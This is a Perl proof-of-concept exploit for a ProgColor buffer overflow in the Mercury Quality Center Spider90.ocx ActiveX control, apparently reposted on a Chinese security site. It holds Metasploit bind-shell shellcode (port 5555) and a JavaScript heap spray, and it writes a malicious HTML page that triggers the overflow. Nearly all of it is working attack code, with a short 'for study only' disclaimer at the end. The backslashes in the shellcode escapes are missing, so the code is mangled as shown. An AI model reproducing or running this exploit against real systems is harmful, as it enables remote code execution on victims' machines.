#!/usr/bin/perl # POC exploit for Mercury Quality Center Spider90.ocx ProgColor Overflow # credit to Skylined, Trirat Puttaraksa, HDM Skape and the rest of the # metasploit crew. This exploit is just a cut and paste of thier code they # deserve the credit # Vulnerability found by Titon and Ri0t of Bastardlabs use strict; # win32_bind LPORT = 5555 - Metasploit my $shellcode = \"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6cx24x24x8bx45\". \"x3cx8bx7cx05x78x01xefx8bx4fx18x8bx5fx20x01xebx49\". \"x8bx34x8bx01xeex31xc0x99xacx84xc0x74x07xc1xcax0d\". \"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5fx24x01xebx66\". \"x8bx0cx4bx8bx5fx1cx01xebx03x2cx8bx89x6cx24x1cx61\". \"xc3x31xdbx64x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40\". \"x08x5ex68x8ex4ex0execx50xffxd6x66x53x66x68x33x32\". \"x68x77x73x32x5fx54xffxd0x68xcbxedxfcx3bx50xffxd6\". \"x5fx89xe5x66x81xedx08x02x55x6ax02xffxd0x68xd9x09\". \"xf5xadx57xffxd6x53x53x53x53x53x43x53x43x53xffxd0\". \"x66x68x15xb3x66x53x89xe1x95x68xa4x1ax70xc7x57xff\". \"xd6x6ax10x51x55xffxd0x68xa4xadx2exe9x57xffxd6x53\". \"x55xffxd0x68xe5x49x86x49x57xffxd6x50x54x54x55xff\". \"xd0x93x68xe7x79xc6x79x57xffxd6x55xffxd0x66x6ax64\". \"x66x68x63x6dx89xe5x6ax50x59x29xccx89xe7x6ax44x89\". \"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93x8dx7ax38xab\". \"xabxabx68x72xfexb3x16xffx75x44xffxd6x5bx57x52x51\". \"x51x51x6ax01x51x51x55x51xffxd0x68xadxd9x05xcex53\". \"xffxd6x6axffxffx37xffxd0x8bx57xfcx83xc4x64xffxd6\". \"x52xffxd0x68xf0x8ax04x5fx53xffxd6xffxd0\"; my $jscript = \"<script> \" . \"shellcode = unescape(\"\" . convert_shellcode($shellcode) .\"\"); \" . \"bigblock = unescape(\"\\%u9090\\%u9090\"); \" . \"headersize = 20; \" . \"slackspace = headersize+shellcode.length; \" . \"while (bigblock.length<slackspace) bigblock+=bigblock; \" . \"fillblock = bigblock.substring(0, slackspace); \" . \"block = bigblock.substring(0, bigblock.length-slackspace); \" . \"while(block.length+slackspace<0x40000) block = block+block+fillblock; \" . \"memory = new Array(); \" . \"for (i=0;i<350;i++) memory[i] = block + shellcode; \" . \"</script>\"; my $header = \"<html> \" . \"<head> \" . \"</head> \" . $jscript . \"<body> \"; my $footer = \"</body> \" . \"</html>\"; my $body = \"<OBJECT ID=\"MQC\" CLASSID=\"CLSID:98c53984-8bf8-4d11-9b1c-c324fca9cade\" CODEBASE=\"Spider90.ocx#Version=9,1,0,4353\" WIDTH=100\\% HEIGHT=100\\%> \" . \"<PARAM NAME=\"ProgColor\" value=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFFFFx0dx0dx0dx0d\"> \" . \"</object> \" . \"</body> \" . \"</html>\"; my $page = \"xffxfe\"; # magic number of M$ unicode file my $c; foreach $c (split //, ($header)) { $page = $page . $c . \"x00\"; } foreach $c (split //, ($body . $footer)) { $page = $page . $c . \"x00\"; } open (IE, \">\", \"exploit.html\"); print IE $page; close IE; # This function copy from JSUnescape() code in Metasploit sub convert_shellcode { my $data = shift; my $mode = shift() || \'LE\'; my $code = \'\'; # Encode the shellcode via %u sequences for JS\'s unescape() function my $idx = 0; # Pad to an even number of bytes if (length($data) % 2 != 0) { $data .= substr($data, -1, 1); } while ($idx < length($data) - 1) { my $c1 = ord(substr($data, $idx, 1)); my $c2 = ord(substr($data, $idx+1, 1)); if ($mode eq \'LE\') { $code .= sprintf(\'%%u%.2x%.2x\', $c2, $c1); } else { $code .= sprintf(\'%%u%.2x%.2x\', $c1, $c2); } $idx += 2; } return $code; }
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论